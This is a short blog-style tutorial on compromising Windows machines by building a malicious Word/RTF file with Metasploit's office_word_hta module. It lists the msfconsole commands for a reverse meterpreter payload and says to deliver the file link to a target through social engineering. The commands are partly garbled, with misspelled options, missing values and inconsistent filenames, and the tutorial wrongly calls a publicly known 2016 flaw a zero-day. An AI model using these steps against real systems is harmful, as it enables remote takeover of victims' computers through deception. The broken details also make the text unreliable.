Exploit Remote PC using Microsoft Office Word Malicious Hta Execution

For Kali Linux users we had perform this attack through metasploit without using any python script which generates .rtf file for attack, thus the user only need to update their kali Linux and load metasploit framework to start this attack. This is a zero –day exploit that has excellent rating against Ms-office vulnerability which can be very easily used to shoot any targeted windows system.

Attacker: Kali Linux
Target: MS Office

Let’s breach!!


This module creates a malicious RTF file that when opened in vulnerable versions of Microsoft Word will lead to code execution. The flaw exists in how an OLE link object can make an http(s) request, and execute hta code in response. This bug was originally seen being exploited in the wild starting in Oct 2016. This module was created by reversing a public malware sample.

Object Linking and Embedding Based on Component Object Model (COM) provides the majority of compatibility on Office, Working with default/third-party applications to provide rich documentation features to Office users.
Use exploit/windows/fileformat/office_word_hta
Msf > exploit (office_word_hta) >set srvhost
Msf > exploit (office_word_hta) >set paylod windows/meterpreter/revrese_tcp
Msf > exploit (office_word_hta) >set filename sale.doc
Msf > exploit (office_word_hta) >set lhost
Msf > exploit (office_word_hta) >exploit

 This module will automatically generate a malicious .rtf file inside /root/.msf4/local/sales.doc moreover it will generate a link and that link must be share to target using social engineering method.

When the user will open that link and make double click (OLE event) on .hta file, the attacker will received meterpreter sesssion in metasploit framewok.
Meterpreter > sysinfo


Post a Comment